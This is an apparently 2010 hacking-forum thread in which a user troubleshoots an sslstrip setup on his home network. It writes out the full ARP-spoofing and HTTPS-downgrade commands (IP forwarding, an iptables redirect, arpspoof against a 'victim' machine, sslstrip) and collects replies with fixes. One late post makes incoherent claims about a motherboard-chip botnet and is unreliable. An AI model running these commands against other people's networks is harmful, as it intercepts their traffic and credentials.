Orange Chicken Posted January 30, 2010 Posted January 30, 2010 Hello everyone. After many issues with ettercap I saw Darren's segment on sslstrip. I noticed he was using one of the Dsniff tools so I decided to give it a try. I run ubuntu 9.10 on my laptop and windows xp on my desktop. The steps I used were the same a Darren's in the show. My shell output for all of this is: anon@ubuntu:~$ sudo su [sudo] password for anon: root@ubuntu:/home/anon# sudo echo "1" > /proc/sys/net/ipv4/ip_forwardroot@ubuntu:/home/anon# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 root@ubuntu:/home/anon# arpspoof -i wlan0 -t 192.168.1.106 192.168.1.1 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a 192.168.1.106 is my xp box (victim) and 192.168.1.1 is of course the default gateway. Then I cd to sslstrips folder "cd /home/anon/Downloads/sslstrip-0.7" and run it on port 8080 with "python sslstrip.py -l 8080" So my issue is that when I try to surf the internet on the victim pc I get a Server not found page every time. Thanks for the help guys and gals. P.S. I don't know if this makes a difference, but just for the heck of it the router is a linksys wrt54g. Thanks in advance Quote
Charles Posted January 30, 2010 Posted January 30, 2010 Sounds like it's sending all traffic to yer laptop instead of the gateway, so it won't be able to get on the internet. Is it able to access other network resources? Quote
Netshroud Posted January 30, 2010 Posted January 30, 2010 That should work. Grab Wireshark and see what's going on. In particular, look at the HTTP requests and responses on both machines. Quote
Burning Aces Posted February 1, 2010 Posted February 1, 2010 that wont work remove the quotes on root@ubuntu:/home/anon# sudo echo "1" > /proc/sys/net/ipv4/ip_forward also ettercap(cli) > arp spoof Quote
Orange Chicken Posted February 1, 2010 Author Posted February 1, 2010 I tried removing the quotes from echo "1" > /proc/sys/net/ipv4/ip_forward and I got the same result. I don't really know what I'm looking for when running wireshark, but to respond newbishly to your suggestion I'll tell you what i noticed. If I start a torrent on the target machine it is interrupted by arpspoof the same way that http traffic is halted, but in wireshark I can still see outgoing requests for webpages coming from the target machine. The reason I am using arpspoof is because I've had so many issues trying to use ettercap so that's out of the question at the moment. I'm anxiously awaiting a hak5 episode about ettercap to hopefully spur some good forum discussion about common issues with ettercap. Anyway, any other suggestions. Thanks for the ones so far. Quote
Burning Aces Posted February 2, 2010 Posted February 2, 2010 I tried removing the quotes from echo "1" > /proc/sys/net/ipv4/ip_forward and I got the same result. I don't really know what I'm looking for when running wireshark, but to respond newbishly to your suggestion I'll tell you what i noticed. If I start a torrent on the target machine it is interrupted by arpspoof the same way that http traffic is halted, but in wireshark I can still see outgoing requests for webpages coming from the target machine. The reason I am using arpspoof is because I've had so many issues trying to use ettercap so that's out of the question at the moment. I'm anxiously awaiting a hak5 episode about ettercap to hopefully spur some good forum discussion about common issues with ettercap. Anyway, any other suggestions. Thanks for the ones so far. go to the ettercap site or RTFM! ettercap is simple, best way is to capture and arp request packet with wireshark and edit it with hexedit and then make a script to send the packet every few seconds dont be dependent on hak5 to solve all your issues and teach you everything get out there and learn it yourself Quote
Orange Chicken Posted February 2, 2010 Author Posted February 2, 2010 go to the ettercap site or RTFM! ettercap is simple, best way is to capture and arp request packet with wireshark and edit it with hexedit and then make a script to send the packet every few seconds dont be dependent on hak5 to solve all your issues and teach you everything get out there and learn it yourself Burning Aces, my post is not about ettercap and I have read the manual pages as well as many other sources on ettercap. I can use it but I receive errors no matter whether I compile it myself or what changes I make to etter.conf. I am a fan of hak5 and have been for some time, but that does not mean that I get all of my information here, I would simply like some active discussion about it. This, however, is not the thread in which I plan to discuss ettercap. I am interrested in solving this arpspoof issue. Thanks for your input, but my issue remains the same. Quote
Burning Aces Posted February 6, 2010 Posted February 6, 2010 Burning Aces, my post is not about ettercap and I have read the manual pages as well as many other sources on ettercap. I can use it but I receive errors no matter whether I compile it myself or what changes I make to etter.conf. I am a fan of hak5 and have been for some time, but that does not mean that I get all of my information here, I would simply like some active discussion about it. This, however, is not the thread in which I plan to discuss ettercap. I am interrested in solving this arpspoof issue. Thanks for your input, but my issue remains the same. learn to make your own packets. as i said arp spoof is gay. if you wish ill show you how to craft your own packets Quote
Orange Chicken Posted February 7, 2010 Author Posted February 7, 2010 I would very much appreciate a lesson in creating my own packets. thank you. Quote
cabster21 Posted February 7, 2010 Posted February 7, 2010 Can you normally access the internet on your ubuntu box? It might be something as simple as not having the default gateway set on the linux machine. Open up a terminal and type in route. If it's not there - route add default gw 192.168.1.1 netmask 255.255.255.0. Assuming you're on that subnet. Quote
Orange Chicken Posted February 7, 2010 Author Posted February 7, 2010 Can you normally access the internet on your ubuntu box? It might be something as simple as not having the default gateway set on the linux machine. Open up a terminal and type in route. If it's not there - route add default gw 192.168.1.1 netmask 255.255.255.0. Assuming you're on that subnet. Yes, I can normally access the internet on my ubuntu box. My output for route is Kernel IP routing table Destination Gateway Genmask Flags Metric Ref Use Iface 192.168.1.0 * 255.255.255.0 U 2 0 0 wlan0 link-local * 255.255.0.0 U 1000 0 0 wlan0 default 192.168.1.1 0.0.0.0 UG 0 0 0 wlan0 thanks Quote
cabster21 Posted February 8, 2010 Posted February 8, 2010 Oh, you're using wireless. I've never tried it, wired it will work with the steps you've done. Sorry, I know this doesn't solve your problem. But if you're just wanting to see it work, go wired. Quote
lopez1364 Posted February 8, 2010 Posted February 8, 2010 I've read a topic like this a year ago... its DDOS attack on xbox live accounts. If this happens multiple times, xbox live will ban you. Quote
Orange Chicken Posted February 20, 2010 Author Posted February 20, 2010 Thanks guys, I'll give it a try plugged in. Quote
antihacker101 Posted February 24, 2010 Posted February 24, 2010 i can tell ya whats going on. the highest priority of the hacker that created the botnet system since aug 2008 was to make it undetectable. the main botnet is actually a backdoor injected into your motherboard through a chip flaw. if you was to format and install a firewall, you can use sysinternal's process monitor and watch it use both sides of the connection to breakthrough. the hacker injects radio packets from a smartphone through a phone tower to send a request for info of your system. he then uses codes to talk back and forth using cookies and smtp. if you had best security, the hacker would create an incoming cookie that i always choose block/allow/view info. no matter what you choose, the worm intercepts the packets and recieves commands from your hacker buddy. the worm in return if need be, creates an smtp packet with codes in the subject using dollarsigns before and after a word. that is how they mainly talk. when you see ANON scripts or packets, that means that he hijacked your first master boot record. this is where the codes are that he injects into your browser to connect to other sites. when you see the ARP packets, it means that he has hijacked your drivers/firmware/kernel and set it up to run independant of your operating system. you may be pinging as much as 2 or 3 thousand ips per hour 24/7. the only way to detect so far(besides your connection being so slow), is to put a router with a good log between your connection and computer . this will show incoming and outgoing. all that is required for this to run is to turn your machine on. and later on if you get these kernel lags, you prolly have another infected machine locally that is turned on. or it seems he may alter timers and threads. when this first started and may be how you guys can help me figure out, you could not even low level format any hardrive if there was more than 1 active anywhere on the network. now i cant even low level format any drive. when i used dban, it repeativly mentioned DAV. and of course the access violation(cache(part of chip hack)) related. i went through my notes and noticed an old message i wrote down while monitoring the worm that said AXEL.DAV = data interface. i would like to know if anyone knows t hat that is or means. thanks Quote
Burning Aces Posted April 3, 2010 Posted April 3, 2010 I would very much appreciate a lesson in creating my own packets. thank you. ok pm me some time Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.